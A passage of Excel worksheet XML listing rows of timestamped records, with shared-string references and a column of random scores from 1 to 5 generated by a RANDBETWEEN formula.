    <row r="9432" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9432" s="1">
        <v>43362.671759259261</v>
      </c>
      <c r="C9432" t="s">
        <v>10</v>
      </c>
      <c r="D9432" t="s">
        <v>178</v>
      </c>
      <c r="E9432" t="s">
        <v>8414</v>
      </c>
      <c r="F9432">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9433" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9433" s="1">
        <v>43362.662893518522</v>
      </c>
      <c r="C9433" t="s">
        <v>10</v>
      </c>
      <c r="D9433" t="s">
        <v>56</v>
      </c>
      <c r="E9433" t="s">
        <v>8415</v>
      </c>
      <c r="F9433">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9434" s="1">
        <v>43362.659895833334</v>
      </c>
      <c r="C9434" t="s">
        <v>10</v>
      </c>
      <c r="D9434" t="s">
        <v>86</v>
      </c>
      <c r="E9434" t="s">
        <v>8416</v>
      </c>
      <c r="F9434">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9435" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9435" s="1">
        <v>43362.659421296295</v>
      </c>
      <c r="C9435" t="s">
        <v>10</v>
      </c>
      <c r="D9435" t="s">
        <v>330</v>
      </c>
      <c r="E9435" s="2" t="s">
        <v>8417</v>
      </c>
      <c r="F9435">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9436" s="1">
        <v>43362.657777777778</v>
      </c>
      <c r="C9436" t="s">
        <v>10</v>
      </c>
      <c r="D9436" t="s">
        <v>163</v>
      </c>
      <c r="E9436" t="s">
        <v>8418</v>
      </c>
      <c r="F9436">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9437" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9437" s="1">
        <v>43362.632569444446</v>
      </c>
      <c r="C9437" t="s">
        <v>6</v>
      </c>
      <c r="D9437" t="s">
        <v>194</v>
      </c>
      <c r="E9437" t="s">
        <v>8419</v>
      </c>
      <c r="F9437">
        <f t="shared" ca="1" si="147"/>
        <v>1</v>
      </c>
    </row>
    <row r="9438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9438" s="1">
        <v>43362.618333333332</v>
      </c>
      <c r="C9438" t="s">
        <v>10</v>
      </c>
      <c r="D9438" t="s">
        <v>52</v>
      </c>
      <c r="E9438" t="s">
        <v>8420</v>
      </c>
      <c r="F9438">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9439" s="1">
        <v>43362.573831018519</v>
      </c>
      <c r="C9439" t="s">
        <v>10</v>
      </c>
      <c r="D9439" t="s">
        <v>11</v>
      </c>
      <c r="E9439" t="s">
        <v>8421</v>
      </c>
      <c r="F9439">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9440" s="1">
        <v>43362.518738425926</v>
      </c>
      <c r="C9440" t="s">
        <v>48</v>
      </c>
      <c r="D9440" t="s">
        <v>312</v>
      </c>
      <c r="E9440" t="s">
        <v>8422</v>
      </c>
      <c r="F9440">
        <f t="shared" ca="1" si="147"/>
        <v>1</v>
      </c>
    </row>
    <row r="9441" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9441" s="1">
        <v>43362.516689814816</v>
      </c>
      <c r="C9441" t="s">
        <v>10</v>
      </c>
      <c r="D9441" t="s">
        <v>39</v>
      </c>
      <c r="E9441" s="2" t="s">
        <v>8423</v>
      </c>
      <c r="F9441">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9442" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9442" s="1">
        <v>43362.51053240741</v>
      </c>
      <c r="C9442" t="s">
        <v>65</v>
      </c>
      <c r="E9442" s="2" t="s">
        <v>8424</v>
      </c>
      <c r="F9442">
        <f t="shared" ca="1" si="147"/>
        <v>1</v>
      </c>
    </row>
    <row r="9443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9443" s="1">
        <v>43362.494837962964</v>
      </c>
      <c r="C9443" t="s">
        <v>10</v>
      </c>
      <c r="D9443" t="s">
        <v>6</v>
      </c>
      <c r="E9443" t="s">
        <v>8425</v>
      </c>
      <c r="F9443">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9444" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9444" s="1">
        <v>43362.476134259261</v>
      </c>
      <c r="C9444" t="s">
        <v>10</v>
      </c>
      <c r="D9444" t="s">
        <v>46</v>
      </c>
      <c r="E9444" t="s">
        <v>8426</v>
      </c>
      <c r="F9444">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9445" s="1">
        <v>43362.464618055557</v>
      </c>
      <c r="C9445" t="s">
        <v>222</v>
      </c>
      <c r="D9445" t="s">
        <v>312</v>
      </c>
      <c r="E9445" t="s">
        <v>8427</v>
      </c>
      <c r="F9445">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9446" s="1">
        <v>43362.461157407408</v>
      </c>
      <c r="C9446" t="s">
        <v>10</v>
      </c>
      <c r="D9446" t="s">
        <v>20</v>
      </c>
      <c r="E9446" t="s">
        <v>8428</v>
      </c>
      <c r="F9446">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9447" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A9447" s="1">
        <v>43362.442291666666</v>
      </c>
      <c r="C9447" t="s">
        <v>65</v>
      </c>
      <c r="E9447" s="2" t="s">
        <v>8429</v>
      </c>
      <c r="F9447">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9448" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9448" s="1">
        <v>43362.428900462961</v>
      </c>
      <c r="C9448" t="s">
        <v>10</v>
      </c>
      <c r="D9448" t="s">
        <v>52</v>
      </c>
      <c r="E9448" t="s">
        <v>8430</v>
      </c>
      <c r="F9448">
        <f t="shared" ca="1" si="147"/>
        <v>1</v>
      </c>
    </row>
    <row r="9449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9449" s="1">
        <v>43362.410740740743</v>
      </c>
      <c r="C9449" t="s">
        <v>634</v>
      </c>
      <c r="D9449" t="s">
        <v>667</v>
      </c>
      <c r="E9449" t="s">
        <v>8431</v>
      </c>
      <c r="F9449">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9450" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A9450" s="1">
        <v>43362.399189814816</v>
      </c>
      <c r="C9450" t="s">
        <v>10</v>
      </c>
      <c r="D9450" t="s">
        <v>192</v>
      </c>
      <c r="E9450" s="2" t="s">
        <v>8432</v>
      </c>
      <c r="F9450">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9451" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A9451" s="1">
        <v>43362.397349537037</v>
      </c>
      <c r="C9451" t="s">
        <v>10</v>
      </c>
      <c r="D9451" t="s">
        <v>33</v>
      </c>
      <c r="E9451" s="2" t="s">
        <v>8433</v>
      </c>
      <c r="F9451">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9452" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9452" s="1">
        <v>43362.390081018515</v>
      </c>
      <c r="C9452" t="s">
        <v>16</v>
      </c>
      <c r="E9452" s="2" t="s">
        <v>8434</v>
      </c>
      <c r="F9452">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9453" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9453" s="1">
        <v>43362.371701388889</v>
      </c>
      <c r="C9453" t="s">
        <v>71</v>
      </c>
      <c r="D9453" t="s">
        <v>312</v>
      </c>
      <c r="E9453" s="2" t="s">
        <v>8435</v>
      </c>
      <c r="F9453">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9454" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9454" s="1">
        <v>43362.36309027778</v>
      </c>
      <c r="C9454" t="s">
        <v>41</v>
      </c>
      <c r="E9454" s="2" t="s">
        <v>8436</v>
      </c>
      <c r="F9454">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9455" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9455" s="1">
        <v>43362.351087962961</v>
      </c>
      <c r="C9455" t="s">
        <v>103</v>
      </c>
      <c r="D9455" t="s">
        <v>312</v>
      </c>
      <c r="E9455" s="2" t="s">
        <v>8437</v>
      </c>
      <c r="F9455">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9456" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9456" s="1">
        <v>43362.32372685185</v>
      </c>
      <c r="C9456" t="s">
        <v>50</v>
      </c>
      <c r="E9456" s="2" t="s">
        <v>8438</v>
      </c>
      <c r="F9456">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9457" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9457" s="1">
        <v>43362.302858796298</v>
      </c>
      <c r="C9457" t="s">
        <v>41</v>
      </c>
      <c r="E9457" t="s">
        <v>8439</v>
      </c>
      <c r="F9457">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9458" s="1">
        <v>43362.290185185186</v>
      </c>
      <c r="C9458" t="s">
        <v>8440</v>
      </c>
      <c r="E9458" t="s">
        <v>8441</v>
      </c>
      <c r="F9458">
        <f t="shared" ca="1" si="147"/>
        <v>4</v>
      </c>
    </row>
    <row r="9459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9459" s="1">
        <v>43362.287002314813</v>
      </c>
      <c r="C9459" t="s">
        <v>197</v>
      </c>
      <c r="E9459" t="s">
        <v>8442</v>
      </c>
      <c r="F9459">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9460" s="1">
        <v>43362.271886574075</v>
      </c>
      <c r="C9460" t="s">
        <v>41</v>
      </c>
      <c r="E9460" t="s">
        <v>8443</v>
      </c>
      <c r="F9460">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9461" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9461" s="1">
        <v>43362.270428240743</v>
      </c>
      <c r="C9461" t="s">
        <v>124</v>
      </c>
      <c r="E9461" s="2" t="s">
        <v>8444</v>
      </c>
      <c r="F9461">
        <f t="shared" ca="1" si="147"/>
        <v>1</v>
      </c>
    </row>
    <row r="9462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9462" s="1">
        <v>43362.266018518516</v>
      </c>
      <c r="C9462" t="s">
        <v>48</v>
      </c>
      <c r="E9462" t="s">
        <v>8445</v>
      </c>
      <c r="F9462">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9463" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A9463" s="1">
        <v>43362.22828703704</v>
      </c>
      <c r="C9463" t="s">
        <v>71</v>
      </c>
      <c r="E9463" s="2" t="s">
        <v>8446</v>
      </c>
      <c r="F9463">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9464" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A9464" s="1">
        <v>43362.218923611108</v>
      </c>
      <c r="C9464" t="s">
        <v>10</v>
      </c>
      <c r="D9464" t="s">
        <v>36</v>
      </c>
      <c r="E9464" s="2" t="s">
        <v>8447</v>
      </c>
      <c r="F9464">
        <f t="shared" ca="1" si="147"/>
        <v>1</v>
      </c>
    </row>
    <row r="9465" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9465" s="1">
        <v>43362.216597222221</v>
      </c>
      <c r="C9465" t="s">
        <v>43</v>
      </c>
      <c r="E9465" s="2" t="s">
        <v>8448</v>
      </c>
      <c r="F9465">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9466" s="1">
        <v>43362.15556712963</v>
      </c>
      <c r="C9466" t="s">
        <v>48</v>
      </c>
      <c r="E9466" t="s">
        <v>8449</v>
      </c>
      <c r="F9466">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9467" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9467" s="1">
        <v>43362.154675925929</v>
      </c>
      <c r="C9467" t="s">
        <v>10</v>
      </c>
      <c r="E9467" s="2" t="s">
        <v>8450</v>
      </c>
      <c r="F9467">
        <f t="shared" ca="1" si="147"/>
        <v>3</v>
      </c>
    </row>
    <row r="9468" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9468" s="1">
        <v>43362.154664351852</v>
      </c>
      <c r="C9468" t="s">
        <v>10</v>
      </c>
      <c r="E9468" s="2" t="s">
        <v>8450</v>
      </c>
      <c r="F9468">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9469" s="1">
        <v>43362.154178240744</v>
      </c>
      <c r="C9469" t="s">
        <v>41</v>
      </c>
      <c r="E9469" t="s">
        <v>8451</v>
      </c>
      <c r="F9469">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9470" s="1">
        <v>43362.150601851848</v>
      </c>
      <c r="C9470" t="s">
        <v>73</v>
      </c>
      <c r="E9470" t="s">
        <v>8452</v>
      </c>
      <c r="F9470">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9471" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A9471" s="1">
        <v>43362.140659722223</v>
      </c>
      <c r="C9471" t="s">
        <v>408</v>
      </c>
      <c r="E9471" s="2" t="s">
        <v>8453</v>
      </c>
      <c r="F9471">
        <f t="shared" ca="1" si="147"/>
        <v>5</v>
      </c>
    </row>
    <row r="9472" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9472" s="1">
        <v>43362.115856481483</v>
      </c>
      <c r="C9472" t="s">
        <v>140</v>
      </c>
      <c r="D9472" t="s">
        <v>234</v>
      </c>
      <c r="E9472" s="2" t="s">
        <v>8454</v>
      </c>
      <c r="F9472">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9473" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A9473" s="1">
        <v>43362.103125000001</v>
      </c>
      <c r="C9473" t="s">
        <v>10</v>
      </c>
      <c r="D9473" t="s">
        <v>86</v>
      </c>
      <c r="E9473" s="2" t="s">
        <v>8455</v>
      </c>
      <c r="F9473">
        <f t="shared" ca="1" si="147"/>
        <v>2</v>
      </c>
    </row>
    <row r="9474" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9474" s="1">
        <v>43362.1018287037</v>
      </c>
      <c r="C9474" t="s">
        <v>10</v>
      </c>
      <c r="D9474" t="s">
        <v>86</v>
      </c>
      <c r="E9474" s="2" t="s">
        <v>8456</v>
      </c>
      <c r="F9474">
        <f t="shared" ref="F9474:F9537" ca="1" si="148">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="9475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9475" s="1">
        <v>43362.044560185182</v>
      </c>
      <c r="C9475" t="s">
        <v>319</v>
      </c>
      <c r="D9475" t="s">
        <v>320</v>
      </c>
      <c r="F9475">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9476" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A9476" s="1">
        <v>43361.992395833331</v>
      </c>
      <c r="C9476" t="s">
        <v>73</v>
      </c>
      <c r="E9476" s="2" t="s">
        <v>8457</v>
      </c>
      <c r="F9476">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9477" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9477" s="1">
        <v>43361.920335648145</v>
      </c>
      <c r="C9477" t="s">
        <v>410</v>
      </c>
      <c r="E9477" s="2" t="s">
        <v>8458</v>
      </c>
      <c r="F9477">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9478" s="1">
        <v>43361.865995370368</v>
      </c>
      <c r="C9478" t="s">
        <v>140</v>
      </c>
      <c r="D9478" t="s">
        <v>141</v>
      </c>
      <c r="E9478" t="s">
        <v>8459</v>
      </c>
      <c r="F9478">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9479" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9479" s="1">
        <v>43361.852766203701</v>
      </c>
      <c r="C9479" t="s">
        <v>6</v>
      </c>
      <c r="D9479" t="s">
        <v>25</v>
      </c>
      <c r="E9479" s="2" t="s">
        <v>8460</v>
      </c>
      <c r="F9479">
        <f t="shared" ca="1" si="148"/>
        <v>4</v>
      </c>
    </row>
    <row r="9480" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9480" s="1">
        <v>43361.815706018519</v>
      </c>
      <c r="C9480" t="s">
        <v>140</v>
      </c>
      <c r="D9480" t="s">
        <v>141</v>
      </c>
      <c r="E9480" t="s">
        <v>8461</v>
      </c>
      <c r="F9480">
        <f t="shared" ca="1" si="148"/>
        <v>3</v>
      </c>
    </row>
    <row r="9481" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9481" s="1">
        <v>43361.780393518522</v>
      </c>
      <c r="C9481" t="s">
        <v>471</v>
      </c>
      <c r="E9481" t="s">
        <v>8462</v>
      </c>
      <c r="F9481">
        <f t="shared" ca="1" si="148"/>
        <v>3</v>
      </c>
    </row>
    <row r="9482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9482" s="1">
        <v>43361.76290509259</v>
      </c>
      <c r="C9482" t="s">
        <v>10</v>
      </c>
      <c r="D9482" t="s">
        <v>11</v>
      </c>
      <c r="E9482" t="s">
        <v>8463</v>
      </c>
      <c r="F9482">
        <f t="shared" ca="1" si="148"/>
        <v>3</v>
      </c>
    </row>
    <row r="9483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9483" s="1">
        <v>43361.726574074077</v>
      </c>
      <c r="C9483" t="s">
        <v>10</v>
      </c>
      <c r="D9483" t="s">
        <v>6</v>
      </c>
      <c r="E9483" t="s">
        <v>8464</v>
      </c>
      <c r="F9483">
        <f t="shared" ca="1" si="148"/>
        <v>3</v>
      </c>
    </row>
    <row r="9484" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9484" s="1">
        <v>43361.723287037035</v>
      </c>
      <c r="C9484" t="s">
        <v>10</v>
      </c>
      <c r="D9484" t="s">
        <v>6</v>
      </c>
      <c r="F9484">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9485" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A9485" s="1">
        <v>43361.714212962965</v>
      </c>
      <c r="C9485" t="s">
        <v>82</v>
      </c>
      <c r="E9485" s="2" t="s">
        <v>8465</v>
      </c>
      <c r="F9485">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9486" s="1">
        <v>43361.693043981482</v>
      </c>
      <c r="C9486" t="s">
        <v>10</v>
      </c>
      <c r="D9486" t="s">
        <v>80</v>
      </c>
      <c r="E9486" t="s">
        <v>8466</v>
      </c>
      <c r="F9486">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9487" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9487" s="1">
        <v>43361.67527777778</v>
      </c>
      <c r="C9487" t="s">
        <v>280</v>
      </c>
      <c r="E9487" t="s">
        <v>8467</v>
      </c>
      <c r="F9487">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9488" s="1">
        <v>43361.651284722226</v>
      </c>
      <c r="C9488" t="s">
        <v>41</v>
      </c>
      <c r="E9488" t="s">
        <v>8468</v>
      </c>
      <c r="F9488">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9489" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A9489" s="1">
        <v>43361.647546296299</v>
      </c>
      <c r="C9489" t="s">
        <v>10</v>
      </c>
      <c r="D9489" t="s">
        <v>92</v>
      </c>
      <c r="E9489" s="2" t="s">
        <v>8469</v>
      </c>
      <c r="F9489">
        <f t="shared" ca="1" si="148"/>
        <v>5</v>
      </c>
    </row>
    <row r="9490" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9490" s="1">
        <v>43361.619120370371</v>
      </c>
      <c r="C9490" t="s">
        <v>10</v>
      </c>
      <c r="D9490" t="s">
        <v>6</v>
      </c>
      <c r="E9490" t="s">
        <v>8470</v>
      </c>
      <c r="F9490">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9491" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A9491" s="1">
        <v>43361.575995370367</v>
      </c>
      <c r="C9491" t="s">
        <v>10</v>
      </c>
      <c r="D9491" t="s">
        <v>46</v>
      </c>
      <c r="E9491" s="2" t="s">
        <v>8471</v>
      </c>
      <c r="F9491">
        <f t="shared" ca="1" si="148"/>
        <v>3</v>
      </c>
    </row>
    <row r="9492" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A9492" s="1">
        <v>43361.572430555556</v>
      </c>
      <c r="C9492" t="s">
        <v>10</v>
      </c>
      <c r="D9492" t="s">
        <v>271</v>
      </c>
      <c r="E9492" s="2" t="s">
        <v>8472</v>
      </c>
      <c r="F9492">
        <f t="shared" ca="1" si="148"/>
        <v>5</v>
      </c>
    </row>
    <row r="9493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9493" s="1">
        <v>43361.563935185186</v>
      </c>
      <c r="C9493" t="s">
        <v>10</v>
      </c>
      <c r="D9493" t="s">
        <v>80</v>
      </c>
      <c r="E9493" t="s">
        <v>8473</v>
      </c>
      <c r="F9493">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9494" s="1">
        <v>43361.560532407406</v>
      </c>
      <c r="C9494" t="s">
        <v>10</v>
      </c>
      <c r="D9494" t="s">
        <v>52</v>
      </c>
      <c r="E9494" t="s">
        <v>8474</v>
      </c>
      <c r="F9494">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9495" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9495" s="1">
        <v>43361.560486111113</v>
      </c>
      <c r="C9495" t="s">
        <v>10</v>
      </c>
      <c r="D9495" t="s">
        <v>89</v>
      </c>
      <c r="E9495" t="s">
        <v>8475</v>
      </c>
      <c r="F9495">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9496" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A9496" s="1">
        <v>43361.559756944444</v>
      </c>
      <c r="C9496" t="s">
        <v>140</v>
      </c>
      <c r="D9496" t="s">
        <v>141</v>
      </c>
      <c r="E9496" s="2" t="s">
        <v>8000</v>
      </c>
      <c r="F9496">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9497" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9497" s="1">
        <v>43361.557025462964</v>
      </c>
      <c r="C9497" t="s">
        <v>10</v>
      </c>
      <c r="D9497" t="s">
        <v>11</v>
      </c>
      <c r="E9497" t="s">
        <v>8476</v>
      </c>
      <c r="F9497">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9498" s="1">
        <v>43361.539710648147</v>
      </c>
      <c r="C9498" t="s">
        <v>10</v>
      </c>
      <c r="D9498" t="s">
        <v>17</v>
      </c>
      <c r="E9498" t="s">
        <v>8477</v>
      </c>
      <c r="F9498">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9499" s="1">
        <v>43361.527268518519</v>
      </c>
      <c r="C9499" t="s">
        <v>6</v>
      </c>
      <c r="D9499" t="s">
        <v>25</v>
      </c>
      <c r="E9499" t="s">
        <v>8478</v>
      </c>
      <c r="F9499">
        <f t="shared" ca="1" si="148"/>
        <v>4</v>
      </c>
    </row>
    <row r="9500" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A9500" s="1">
        <v>43361.500798611109</v>
      </c>
      <c r="C9500" t="s">
        <v>43</v>
      </c>
      <c r="E9500" s="2" t="s">
        <v>8479</v>
      </c>
      <c r="F9500">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9501" s="1">
        <v>43361.492708333331</v>
      </c>
      <c r="C9501" t="s">
        <v>41</v>
      </c>
      <c r="E9501" t="s">
        <v>8480</v>
      </c>
      <c r="F9501">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9502" s="1">
        <v>43361.427986111114</v>
      </c>
      <c r="C9502" t="s">
        <v>71</v>
      </c>
      <c r="E9502" t="s">
        <v>8481</v>
      </c>
      <c r="F9502">
        <f t="shared" ca="1" si="148"/>
        <v>3</v>
      </c>
    </row>
    <row r="9503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9503" s="1">
        <v>43361.424409722225</v>
      </c>
      <c r="C9503" t="s">
        <v>10</v>
      </c>
      <c r="D9503" t="s">
        <v>192</v>
      </c>
      <c r="E9503" t="s">
        <v>8482</v>
      </c>
      <c r="F9503">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9504" s="1">
        <v>43361.42423611111</v>
      </c>
      <c r="C9504" t="s">
        <v>10</v>
      </c>
      <c r="D9504" t="s">
        <v>381</v>
      </c>
      <c r="E9504" t="s">
        <v>8483</v>
      </c>
      <c r="F9504">
        <f t="shared" ca="1" si="148"/>
        <v>3</v>
      </c>
    </row>
    <row r="9505" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9505" s="1">
        <v>43361.424212962964</v>
      </c>
      <c r="C9505" t="s">
        <v>10</v>
      </c>
      <c r="D9505" t="s">
        <v>86</v>
      </c>
      <c r="E9505" t="s">
        <v>8484</v>
      </c>
      <c r="F9505">
        <f t="shared" ca="1" si="148"/>
        <v>5</v>
      </c>
    </row>
    <row r="9506" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9506" s="1">
        <v>43361.421701388892</v>
      </c>
      <c r="C9506" t="s">
        <v>10</v>
      </c>
      <c r="D9506" t="s">
        <v>192</v>
      </c>
      <c r="E9506" t="s">
        <v>8485</v>
      </c>
      <c r="F9506">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
    <row r="9507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9507" s="1">
        <v>43361.412604166668</v>
      </c>
      <c r="C9507" t="s">
        <v>10</v>
      </c>
      <c r="D9507" t="s">
        <v>56</v>
      </c>
      <c r="E9507" t="s">
        <v>8486</v>
      </c>
      <c r="F9507">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9508" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9508" s="1">
        <v>43361.405127314814</v>
      </c>
      <c r="C9508" t="s">
        <v>10</v>
      </c>
      <c r="D9508" t="s">
        <v>263</v>
      </c>
      <c r="E9508" t="s">
        <v>8487</v>
      </c>
      <c r="F9508">
        <f t="shared" ca="1" si="148"/>
        <v>2</v>
      </c>
    </row>
    <row r="9509" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A9509" s="1">
        <v>43361.402395833335</v>
      </c>
      <c r="C9509" t="s">
        <v>10</v>
      </c>
      <c r="D9509" t="s">
        <v>192</v>
      </c>
      <c r="E9509" t="s">
        <v>8488</v>
      </c>
      <c r="F9509">
        <f t="shared" ca="1" si="148"/>
        <v>1</v>
      </c>
    </row>
